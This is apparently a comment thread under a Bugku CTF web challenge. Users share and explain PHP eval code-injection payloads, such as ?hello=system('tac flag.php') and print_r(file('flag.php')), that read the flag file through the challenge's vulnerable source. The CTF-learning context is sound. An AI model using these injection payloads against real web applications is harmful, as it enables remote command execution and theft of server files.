http://114.67.246.176:10183/?hello=system('tac flag.php')
原理是什么啊???想了解一下
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
为啥用cat不行呢?
看不懂,求解,大佬
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
@dsadscxzewq cat是可以的,只不过在源代码里查看
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
感谢
Too young Too simple
我的金币不太允许了呀。。。
可以创个小号做后面的题人?
直接读文件吧
只有我一个人知道bugku更新了吗
我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o
...
评论
Hacker23 3年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 2年前
举报
原理是什么啊???想了解一下
guoguo 3年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 3年前
举报
为啥用cat不行呢?
痕夕 3年前
举报
看不懂,求解,大佬
SwBack 3年前
举报
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
巨人肩膀上的矮子 3年前
举报
@dsadscxzewq cat是可以的,只不过在源代码里查看
dsadscxzewq 3年前
举报
为啥用cat不行呢?
BBBugku 3年前
举报
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
krystalll 3年前
举报
感谢
lurnco 3年前
举报
Too young Too simple
Discuze奇 3年前
举报
我的金币不太允许了呀。。。
lurnco 3年前
举报
可以创个小号做后面的题人?
1amer 3年前
举报
直接读文件吧
你听说过呆呆吗? 3年前
举报
只有我一个人知道bugku更新了吗
storn 3年前
举报
我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o